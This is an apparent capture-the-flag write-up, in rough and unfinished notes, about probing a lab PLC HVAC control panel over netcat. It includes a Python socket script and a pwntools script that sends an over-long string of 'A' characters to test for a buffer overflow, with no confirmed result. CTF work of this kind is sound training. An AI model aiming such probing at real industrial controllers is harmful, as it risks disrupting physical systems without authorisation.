DESCRIPTION
You have found programmable logic controller (PLC's) IP address. Can You manage to get access? I've heard a lot of stories there are very critical vulnerabilities and they shouldn't be too hard to exploit.
QUESTION
You found very interesting IP address. Looks like access panel to some logic controller. Try to break it's security.
10.12.32.132
SOLUTION
# nc 10.12.32.132 63513
*****************************************
Industrial PLC - HVAC Control Panel
Authorized access only!
*****************************************
-> Type 'help' to see commands
-> To quit just type 'quit'.
help
Not permitted (command access disabled) - log in via physical console: . 'help' .
^C
Shell
import socket
import time
def sends(bytez):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.12.32.132", 63513))
#s.sendall(bytez)
data = s.recv(1024)
#print("Received:", repr(data))
time.sleep(0.1)
s.sendall(bytez)
s.shutdown(socket.SHUT_WR)
while 1:
data = s.recv(1024)
if data == b"":
break
print("->", repr(data))
print("Connection closed.")
s.close()
sends(bytes([69])+b"\r\n")
Python
Max amount of bytes it'll return: 2048 (maybe buffer overflow???)
Kui saata "A"*2049, siis ta lihtsalt ütleb et "A"*2048 not permitted ja järgmisel real "A"*1 not permitted
pip3 install pwnlib
#!/usr/local/bin/python3
from pwn import *
import re
import random
r = remote('10.12.32.132', 63513)
a = "A"*2050 + "\n"
r.send(encode(a, "utf-8"))
r.interactive()
Bash